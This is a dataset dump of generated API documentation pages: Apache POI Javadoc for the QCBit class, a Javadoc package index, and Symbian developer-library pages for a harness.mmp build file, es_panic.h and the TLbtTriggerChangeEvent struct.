path
stringlengths
5
312
repo_name
stringlengths
5
116
content
stringlengths
2
1.04M
Desktop/tool/poi-bin-3.15-20160924/poi-3.15/docs/apidocs/org/apache/poi/hpbf/model/qcbits/QCBit.html
tommylsh/test20170719
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <title>QCBit (POI API Documentation)</title> <link rel="stylesheet" type="text/css" href="../../../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="QCBit (POI API Documentation)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/QCBit.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev Class</li> <li><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCPLCBit.html" title="class in org.apache.poi.hpbf.model.qcbits"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../../../index.html?org/apache/poi/hpbf/model/qcbits/QCBit.html" target="_top">Frames</a></li> <li><a href="QCBit.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#field_summary">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor_summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#field_detail">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor_detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">org.apache.poi.hpbf.model.qcbits</div> <h2 title="Class QCBit" class="title">Class QCBit</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li>java.lang.Object</li> <li> <ul class="inheritance"> <li>org.apache.poi.hpbf.model.qcbits.QCBit</li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <dl> <dt>Direct Known Subclasses:</dt> <dd><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCPLCBit.html" title="class in org.apache.poi.hpbf.model.qcbits">QCPLCBit</a>, <a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCTextBit.html" title="class in org.apache.poi.hpbf.model.qcbits">QCTextBit</a>, <a href="../../../../../../org/apache/poi/hpbf/model/qcbits/UnknownQCBit.html" title="class in org.apache.poi.hpbf.model.qcbits">UnknownQCBit</a></dd> </dl> <hr> <br> <pre>public abstract class <span class="strong">QCBit</span> extends java.lang.Object</pre> <div class="block">Parent of all Quill CONTENTS bits</div> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- =========== FIELD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="field_summary"> <!-- --> </a> <h3>Field Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Field Summary table, listing fields, and an explanation"> <caption><span>Fields</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Field and Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>protected java.lang.String</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#bitType">bitType</a></strong></code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>protected byte[]</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#data">data</a></strong></code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>protected int</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#dataOffset">dataOffset</a></strong></code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>protected int</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#optA">optA</a></strong></code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>protected int</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#optB">optB</a></strong></code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>protected int</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#optC">optC</a></strong></code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>protected java.lang.String</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#thingType">thingType</a></strong></code>&nbsp;</td> </tr> </table> </li> </ul> <!-- ======== CONSTRUCTOR SUMMARY ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor_summary"> <!-- --> </a> <h3>Constructor Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation"> <caption><span>Constructors</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Constructor and Description</th> </tr> <tr class="altColor"> <td class="colOne"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#QCBit(java.lang.String,%20java.lang.String,%20byte[])">QCBit</a></strong>(java.lang.String&nbsp;thingType, java.lang.String&nbsp;bitType, byte[]&nbsp;data)</code>&nbsp;</td> </tr> </table> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method_summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span>Methods</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>java.lang.String</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#getBitType()">getBitType</a></strong>()</code> <div class="block">Returns the type of the bit data, eg TEXT or PLC</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>byte[]</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#getData()">getData</a></strong>()</code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>int</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#getDataOffset()">getDataOffset</a></strong>()</code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>int</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#getLength()">getLength</a></strong>()</code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>int</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#getOptA()">getOptA</a></strong>()</code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>int</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#getOptB()">getOptB</a></strong>()</code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>int</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#getOptC()">getOptC</a></strong>()</code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>java.lang.String</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#getThingType()">getThingType</a></strong>()</code> <div class="block">Returns the type of the thing, eg TEXT, FONT or TOKN</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#setDataOffset(int)">setDataOffset</a></strong>(int&nbsp;offset)</code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#setOptA(int)">setOptA</a></strong>(int&nbsp;optA)</code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#setOptB(int)">setOptB</a></strong>(int&nbsp;optB)</code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><strong><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCBit.html#setOptC(int)">setOptC</a></strong>(int&nbsp;optC)</code>&nbsp;</td> </tr> </table> <ul class="blockList"> <li class="blockList"><a name="methods_inherited_from_class_java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Object</h3> <code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ============ FIELD DETAIL =========== --> <ul class="blockList"> <li class="blockList"><a name="field_detail"> <!-- --> </a> <h3>Field Detail</h3> <a name="thingType"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>thingType</h4> <pre>protected&nbsp;java.lang.String thingType</pre> </li> </ul> <a name="bitType"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>bitType</h4> <pre>protected&nbsp;java.lang.String bitType</pre> </li> </ul> <a name="data"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>data</h4> <pre>protected&nbsp;byte[] data</pre> </li> </ul> <a name="optA"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>optA</h4> <pre>protected&nbsp;int optA</pre> </li> </ul> <a name="optB"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>optB</h4> <pre>protected&nbsp;int optB</pre> </li> </ul> <a name="optC"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>optC</h4> <pre>protected&nbsp;int optC</pre> </li> </ul> <a name="dataOffset"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>dataOffset</h4> <pre>protected&nbsp;int dataOffset</pre> </li> </ul> </li> </ul> <!-- ========= CONSTRUCTOR DETAIL ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor_detail"> <!-- --> </a> <h3>Constructor Detail</h3> <a name="QCBit(java.lang.String, java.lang.String, byte[])"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>QCBit</h4> <pre>public&nbsp;QCBit(java.lang.String&nbsp;thingType, java.lang.String&nbsp;bitType, byte[]&nbsp;data)</pre> </li> </ul> </li> </ul> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method_detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="getThingType()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getThingType</h4> <pre>public&nbsp;java.lang.String&nbsp;getThingType()</pre> <div class="block">Returns the type of the thing, eg TEXT, FONT or TOKN</div> </li> </ul> <a name="getBitType()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getBitType</h4> <pre>public&nbsp;java.lang.String&nbsp;getBitType()</pre> <div class="block">Returns the type of the bit data, eg TEXT or PLC</div> </li> </ul> <a name="getData()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getData</h4> <pre>public&nbsp;byte[]&nbsp;getData()</pre> </li> </ul> <a name="getOptA()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getOptA</h4> <pre>public&nbsp;int&nbsp;getOptA()</pre> </li> </ul> <a name="setOptA(int)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>setOptA</h4> <pre>public&nbsp;void&nbsp;setOptA(int&nbsp;optA)</pre> </li> </ul> <a name="getOptB()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getOptB</h4> <pre>public&nbsp;int&nbsp;getOptB()</pre> </li> </ul> <a name="setOptB(int)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>setOptB</h4> <pre>public&nbsp;void&nbsp;setOptB(int&nbsp;optB)</pre> </li> </ul> <a name="getOptC()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getOptC</h4> <pre>public&nbsp;int&nbsp;getOptC()</pre> </li> </ul> <a name="setOptC(int)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>setOptC</h4> <pre>public&nbsp;void&nbsp;setOptC(int&nbsp;optC)</pre> </li> </ul> <a name="getDataOffset()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getDataOffset</h4> <pre>public&nbsp;int&nbsp;getDataOffset()</pre> </li> </ul> <a name="setDataOffset(int)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>setDataOffset</h4> <pre>public&nbsp;void&nbsp;setDataOffset(int&nbsp;offset)</pre> </li> </ul> <a name="getLength()"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>getLength</h4> <pre>public&nbsp;int&nbsp;getLength()</pre> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/QCBit.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev Class</li> <li><a href="../../../../../../org/apache/poi/hpbf/model/qcbits/QCPLCBit.html" title="class in org.apache.poi.hpbf.model.qcbits"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../../../index.html?org/apache/poi/hpbf/model/qcbits/QCBit.html" target="_top">Frames</a></li> <li><a href="QCBit.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#field_summary">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor_summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#field_detail">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor_detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small> <i>Copyright 2016 The Apache Software Foundation or its licensors, as applicable.</i> </small></p> </body> </html>
doc/javadoc/parserdocument/package-frame.html
trona85/GII-17.1B-UBULog-1.0
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="es"> <head> <!-- Generated by javadoc (1.8.0_144) on Fri Jan 12 10:34:21 CET 2018 --> <title>parserdocument</title> <meta name="date" content="2018-01-12"> <link rel="stylesheet" type="text/css" href="../stylesheet.css" title="Style"> <script type="text/javascript" src="../script.js"></script> </head> <body> <h1 class="bar"><a href="../parserdocument/package-summary.html" target="classFrame">parserdocument</a></h1> <div class="indexContainer"> <h2 title="Interfaces">Interfaces</h2> <ul title="Interfaces"> <li><a href="IDocumentParser.html" title="interface in parserdocument" target="classFrame"><span class="interfaceName">IDocumentParser</span></a></li> </ul> <h2 title="Classes">Classes</h2> <ul title="Classes"> <li><a href="CsvParser.html" title="class in parserdocument" target="classFrame">CsvParser</a></li> <li><a href="DocumentParser.html" title="class in parserdocument" target="classFrame">DocumentParser</a></li> </ul> </div> </body> </html>
pdk/guid-6013a680-57f9-415b-8851-c4fa63356636/harness_8mmp_source.html
warlordh/fork_Symbian
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <title>TB9.2 Example Applications: examples/AppFramework/Apparc/ServerApplication/harness/harness.mmp Source File</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <link href="doxygen.css" rel="stylesheet" type="text/css"/> <link type="text/css" rel="stylesheet" href="../css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="../css/sdl.css" media="screen"/> <!--[if IE]> <link href="../css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> </head> <body class="kernelguide"> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Product Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <!-- Generated by Doxygen 1.6.2 --> <h1>examples/AppFramework/Apparc/ServerApplication/harness/harness.mmp</h1><div class="fragment"><pre class="fragment"><a name="l00001"></a>00001 <span class="comment">// Copyright (c) 2006-2009 Nokia Corporation and/or its subsidiary(-ies).</span> <a name="l00002"></a>00002 <span class="comment">// All rights reserved.</span> <a name="l00003"></a>00003 <span class="comment">// This component and the accompanying materials are made available</span> <a name="l00004"></a>00004 <span class="comment">// under the terms of &quot;Eclipse Public License v1.0&quot;</span> <a name="l00005"></a>00005 <span class="comment">// which accompanies this distribution, and is available</span> <a name="l00006"></a>00006 <span class="comment">// at the URL &quot;http://www.eclipse.org/legal/epl-v10.html&quot;.</span> <a name="l00007"></a>00007 <span class="comment">//</span> <a name="l00008"></a>00008 <span class="comment">// Initial Contributors:</span> <a name="l00009"></a>00009 <span class="comment">// Nokia Corporation - initial contribution.</span> <a name="l00010"></a>00010 <span class="comment">//</span> <a name="l00011"></a>00011 <span class="comment">// Contributors:</span> <a name="l00012"></a>00012 <span class="comment">//</span> <a name="l00013"></a>00013 <span class="comment">// Description:</span> <a name="l00014"></a>00014 <span class="comment">//</span> <a name="l00015"></a>00015 <a name="l00016"></a>00016 TARGET harness.exe <a name="l00017"></a>00017 TARGETTYPE exe <a name="l00018"></a>00018 UID 0 <a name="l00019"></a>00019 <a name="l00020"></a>00020 SOURCEPATH . <a name="l00021"></a>00021 SOURCE <a class="code" href="redirectprintf_8c.html#a840291bc02cba5474a4cb46a9b9566fe">main</a>.cpp <a name="l00022"></a>00022 <a name="l00023"></a>00023 USERINCLUDE ../service_support/inc <a name="l00024"></a>00024 APP_LAYER_SYSTEMINCLUDE <a name="l00025"></a>00025 <a name="l00026"></a>00026 LIBRARY euser.lib service_support.lib eikcore.lib <a name="l00027"></a>00027 <a name="l00028"></a>00028 SMPSAFE </pre></div> <hr size="1"/><address style="text-align: right;"><small>Generated by&nbsp; <a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.6.2 </small></address> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
pdk/GUID-2C62A291-C9A0-3813-B130-0388AD30C816.html
warlordh/fork_Symbian
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="copyright" content="(C) Copyright 2010"/> <meta name="DC.rights.owner" content="(C) Copyright 2010"/> <meta name="DC.Type" content="cxxFile"/> <meta name="DC.Title" content="es_panic.h"/> <meta name="DC.Format" content="XHTML"/> <meta name="DC.Identifier" content="GUID-2C62A291-C9A0-3813-B130-0388AD30C816"/> <title>es_panic.h</title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api"/><link rel="stylesheet" type="text/css" href="cxxref.css"/></head> <body class="cxxref" id="GUID-2C62A291-C9A0-3813-B130-0388AD30C816"><a name="GUID-2C62A291-C9A0-3813-B130-0388AD30C816"><!-- --></a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()">Collapse all</a> <a id="index" href="index.html">Symbian^3 Product Developer Library</a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1">&#160;</div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2437088 id2437096 id2578593 id2611716 id2446904 id2446909 "; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"><a href="index.html" title="Symbian^3 Product Developer Library">Symbian^3 Product Developer Library</a> &gt;</div> <h1 class="topictitle1">es_panic.h File Reference</h1> <div class="nested1" id="GUID-4B906963-A8B8-36DD-925C-B16E52859D9A"><a name="GUID-4B906963-A8B8-36DD-925C-B16E52859D9A"><!-- --></a> <h2 class="topictitle2">const TLitC&lt; sizeof(L"ESock_client")/2 &gt; KESockClientPanic</h2> <table class="signature"><tr><td>const <a href="GUID-02059516-298A-3DB3-937C-9D9B2C1DBE07.html">TLitC</a>&lt; sizeof(L"ESock_client")/2 &gt;</td><td>KESockClientPanic</td><td>[static]</td></tr></table><div class="section"><div> <p>The panic category for panics experienced by ESOCK clients (was "eSock panic" before Symbian OS version 9.1) <a href="GUID-9CD4D12D-7496-3C87-B5BE-8C010DFE3392.html#GUID-DA6EE4A8-3A91-3AAA-A99D-291B91A8AAAF">TESockPanic</a> </p> </div></div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
pdk/GUID-83E609E8-5488-36A0-AC16-14AA80680809.html
warlordh/fork_Symbian
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="copyright" content="(C) Copyright 2010"/> <meta name="DC.rights.owner" content="(C) Copyright 2010"/> <meta name="DC.Type" content="cxxStruct"/> <meta name="DC.Title" content="TLbtTriggerChangeEvent"/> <meta name="DC.Format" content="XHTML"/> <meta name="DC.Identifier" content="GUID-83E609E8-5488-36A0-AC16-14AA80680809"/> <title>TLbtTriggerChangeEvent</title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api"/><link rel="stylesheet" type="text/css" href="cxxref.css"/></head> <body class="cxxref" id="GUID-83E609E8-5488-36A0-AC16-14AA80680809"><a name="GUID-83E609E8-5488-36A0-AC16-14AA80680809"><!-- --></a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()">Collapse all</a> <a id="index" href="index.html">Symbian^3 Product Developer Library</a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1">&#160;</div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2437088 id2437096 id2366708 id2401032 id2645784 id2646061 "; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"><a href="index.html" title="Symbian^3 Product Developer Library">Symbian^3 Product Developer Library</a> &gt;</div> <h1 class="topictitle1">TLbtTriggerChangeEvent Struct Reference</h1> <table class="signature"><tr><td>struct TLbtTriggerChangeEvent</td></tr></table><div class="section"><div> <p>Structure defines detailed information of a triggering change event.</p> <div class="p"> <dl class="since"> <dt class="dlterm">Since</dt> <dd>S60 5.1 </dd> </dl> </div> </div></div> <div class="section member-index"><table border="0" class="member-index"><thead><tr><th colspan="2">Public Attributes</th></tr></thead><tbody><tr><td align="right" valign="top"> <a href="GUID-FA386725-A272-35E0-8520-E298D3A987C8.html">TLbtTriggerChangeEventType</a> </td><td><a href="#GUID-23FDB366-E510-30CC-B93E-13CAA416E18A">iEventType</a></td></tr><tr class="bg"><td align="right" valign="top"> <a href="GUID-E9728708-E494-3373-8277-C8BCE6BA4F2B.html">TLbtTriggerId</a> </td><td><a href="#GUID-FD8526E3-CDEF-3F5D-B9C3-8A825AE26082">iTriggerId</a></td></tr><tr><td align="right" valign="top"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint8</a> </td><td><a href="#GUID-1B7D1830-28CC-385A-81CF-9636F3BC4EE9">iUnused</a></td></tr></tbody></table></div><h1 class="pageHeading topictitle1">Member Data Documentation</h1><div class="nested1" id="GUID-23FDB366-E510-30CC-B93E-13CAA416E18A"><a name="GUID-23FDB366-E510-30CC-B93E-13CAA416E18A"><!-- --></a> <h2 class="topictitle2"> TLbtTriggerChangeEventType iEventType</h2> <table class="signature"><tr><td> <a href="GUID-FA386725-A272-35E0-8520-E298D3A987C8.html">TLbtTriggerChangeEventType</a> </td><td>iEventType</td></tr></table><div class="section"><div> <p>Type of the event. </p> </div></div> </div> <div class="nested1" id="GUID-FD8526E3-CDEF-3F5D-B9C3-8A825AE26082"><a name="GUID-FD8526E3-CDEF-3F5D-B9C3-8A825AE26082"><!-- --></a> <h2 class="topictitle2"> TLbtTriggerId iTriggerId</h2> <table class="signature"><tr><td> <a href="GUID-E9728708-E494-3373-8277-C8BCE6BA4F2B.html">TLbtTriggerId</a> </td><td>iTriggerId</td></tr></table><div class="section"><div> <p>ID of a trigger. The ID indicates that the event is associated with one trigger item. If the change is not associated with exactly one item, item ID will be set to <tt>KLbtNullTriggerId</tt>. For instance in the case of <tt>ELbtTriggerChangeEventMultiple</tt> event. </p> </div></div> </div> <div class="nested1" id="GUID-1B7D1830-28CC-385A-81CF-9636F3BC4EE9"><a name="GUID-1B7D1830-28CC-385A-81CF-9636F3BC4EE9"><!-- --></a> <h2 class="topictitle2"> TUint8 iUnused</h2> <table class="signature"><tr><td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TUint8</a> </td><td>iUnused</td></tr></table><div class="section"><div> <p>For future use </p> </div></div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
LabExercise7/dicegame/doc/overview-tree.html
liamh101/JavaUni
